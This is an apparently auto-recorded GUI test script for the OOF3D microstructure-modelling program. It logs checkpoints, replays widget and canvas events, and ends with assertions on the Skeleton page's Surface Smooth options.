checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.New
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Rename
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Field page sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint OOF.Skeleton.Simple
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint OOF.Graphics_1.Layer.Select
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint OOF.Graphics_1.Layer.Select
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint OOF.File.Load.Script
widget_0=findWidget('OOF3D Activity Viewer')
handled_0=widget_0.event(event(gtk.gdk.DELETE,window=widget_0.window))
postpone if not handled_0: widget_0.destroy()
checkpoint OOF.ActivityViewer.File.Close
#Going to the Skeleton Page
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Skeleton')
checkpoint page installed Skeleton
findWidget('OOF3D').resize(601, 357)
findWidget('OOF3D:Skeleton Page:Pane').set_position(250)
checkpoint skeleton page sensitized
checkpoint skeleton page info updated
checkpoint skeleton page info updated
checkpoint skeleton page sensitized
#Selecting the Microstructure '0color'
setComboBox(findWidget('OOF3D:Skeleton Page:Microstructure'), '0color')
checkpoint skeleton page info updated
checkpoint skeleton page info updated
checkpoint skeleton page sensitized
findWidget('OOF3D Graphics 1').resize(1000, 802)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 707))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 707))
findWidget('OOF3D Graphics 1').resize(1000, 806)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 711))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 711))
findWidget('OOF3D Graphics 1').resize(1000, 832)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 737))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 737))
findWidget('OOF3D Graphics 1').resize(1000, 857)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 762))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 762))
findWidget('OOF3D Graphics 1').resize(1000, 873)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 778))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 778))
findWidget('OOF3D Graphics 1').resize(1000, 883)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 788))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 788))
findWidget('OOF3D Graphics 1').resize(1000, 894)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 799))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 799))
findWidget('OOF3D Graphics 1').resize(1000, 897)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 802))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 802))
findWidget('OOF3D Graphics 1').resize(1000, 901)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 806))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 806))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 805))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 805))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 801))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 801))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 793))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 793))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 784))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 784))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 776))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 776))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 770))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 770))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 763))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 763))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 756))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 756))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 750))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 750))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 745))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 745))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 739))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 739))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 736))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 736))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 724))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 724))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 715))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 715))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 709))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 709))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 704))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 704))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 697))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 697))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 691))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 691))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 687))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 687))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 683))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 683))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 682))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 682))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 681))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 681))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 680))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 680))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 679))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 2.7979576943884e+01)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 5.5959153887769e+01)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 8.3938730831653e+01)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 1.1191830777554e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 1.3989788471942e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 1.6787746166331e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 1.9585703860719e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 2.2383661555107e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 2.5181619249496e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 2.7979576943884e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 3.0777534638273e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 3.3200000000000e+02)
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '29')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((29,))
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Hide
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '28')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((28,))
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Show
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '24')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((24,))
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Show
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
findWidget('OOF3D Graphics 1:Pane0:Pane2:tumble').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 1.8600000000000e+02,y= 2.0100000000000e+02,button=1,state=16,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.8600000000000e+02,y= 2.0200000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.8700000000000e+02,y= 2.0300000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.8800000000000e+02,y= 2.0400000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.8900000000000e+02,y= 2.0600000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.9200000000000e+02,y= 2.0800000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.9700000000000e+02,y= 2.1300000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.9900000000000e+02,y= 2.1400000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 2.0000000000000e+02,y= 2.1500000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 2.0300000000000e+02,y= 2.1500000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 2.0500000000000e+02,y= 2.1700000000000e+02,button=1,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
checkpoint OOF.Graphics_1.Settings.Camera.View
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
findWidget('OOF3D Graphics 1:Pane0:Pane2:fill').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
findWidget('OOF3D').resize(601, 357)
# Selecting the Surface Smooth method
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Chooser'), 'Surface Smooth')
assert tests.skeletonPageModificationSensitivityCheck1()
assert tests.skeletonMethodListCheck('Refine','Snap Nodes','Anneal','Smooth','Surface Smooth','Rationalize','Fix Illegal Elements','Snap Refine',)
assert tests.currentSkeletonMethodCheck('Surface Smooth')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D').resize(601, 401)
findWidget('OOF3D:Skeleton Page:Pane').set_position(274)
checkpoint skeleton page sensitized
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
